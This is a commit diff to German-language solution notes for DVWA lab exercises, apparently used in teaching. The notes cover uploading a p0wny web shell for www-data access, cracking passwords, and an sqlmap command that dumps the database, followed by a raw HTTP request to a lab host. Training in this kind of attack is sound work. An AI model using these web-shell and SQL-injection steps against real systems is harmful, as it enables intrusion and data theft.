Commit f7d75766 authored by David's avatar David
Browse files

edited solutions

parent cad62e0e
......@@ -6,3 +6,7 @@ Upload von shell.php (p0wny-shell https://github.com/flozz/p0wny-shell/blob/mast
Aufruf von /vulnerabilities/upload/../../hackable/uploads/shell.php
Man erhält eine vollwertige Shell mit www-data-Rechten.
# Hack mit Metasploit
Ein ausführliches Tutorial findet sich bei [hackingarticles.in](https://www.hackingarticles.in/hack-file-upload-vulnerability-dvwa-bypass-security/)
......@@ -14,6 +14,6 @@ Die Passwörter können nun in einer Rainbowtable nachgeschaut werden (z.B. auf
Nun kann man sich mit anderen Benutzerkennungen anmelden.
# Hack 4: Datenbank-Dump mit SQLMap
[SQLMap]() ist ein Programm zum automatisierten Testen auf und Ausnutzen von SQL-Injektion-Verwundbarkeiten.
[SQLMap](https://github.com/sqlmapproject/sqlmap) ist ein Programm zum automatisierten Testen auf und Ausnutzen von SQL-Injektion-Verwundbarkeiten.
Ein Beispielaufruf könnte so aussehen: `sqlmap.py -a -u "http://[IP of target]/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[Sesson ID]; security=low"`
POST /vulnerabilities/sqli_blind/ HTTP/1.1
Host: 172.16.11.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.11.1/vulnerabilities/sqli_blind/
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
DNT: 1
Connection: close
Cookie: PHPSESSID=o2u53cngsgnmm5l7rek48e6057; security=medium
Upgrade-Insecure-Requests: 1
id=1&Submit=Submit
\ No newline at end of file
Supports Markdown
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment